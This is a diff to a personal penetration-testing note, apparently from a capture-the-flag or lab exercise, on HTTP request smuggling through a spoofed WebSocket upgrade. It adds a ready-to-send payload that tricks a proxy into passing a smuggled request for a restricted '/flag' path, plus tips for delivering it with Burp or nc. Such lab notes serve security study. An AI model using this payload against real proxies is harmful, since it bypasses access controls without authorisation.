H3llKa1ser/B00t2R00t/Web Application Penetration Testing/HTTP Request Smuggling through Websocket.md

 ## TIP: DON'T FORGET TO PRESS ENTER TWICE (ADD 2 NEWLINES UNDER THE PAYLOAD) AFTER THE SMUGGLED HTTP REQUEST TO MAKE THIS ATTACK WORK

 #### 7) Send the request to access the restricted content

+## What if the app doesn't speak WebSocket?

+### Note that some proxies will not even require the existence of a WebSocket endpoint for this technique to work.
+All we need is to fool the proxy into believing we are establishing a connection to a WebSocket, even if this isn't true.
+Look at what happens if you try to send the following payload (be sure to add two newlines after the payload in Burp):

+GET / HTTP/1.1
+Host: 10.10.55.67:8001
+Sec-WebSocket-Version: 13
+Upgrade: WebSocket
+Connection: Upgrade
+Sec-WebSocket-Key: nf6dB8Pb/BLinZ7UexUXHg==

+GET /flag HTTP/1.1
+Host: 10.10.55.67:8001

+### This payload should still work, even though the first request is directed to /, which is not a WebSocket-enabled endpoint.
+The proxy simply doesn't check the response from the upgrade, so you can use any payload that looks close enough to a WebSocket upgrade.

+## NOTE: This payload will randomly fail when using Burp.
+You can either retry the payload a couple of times until it works, or deliver it by pasting it into a terminal running nc 10.10.55.67 8001, where it will work every time (don't forget the trailing newlines).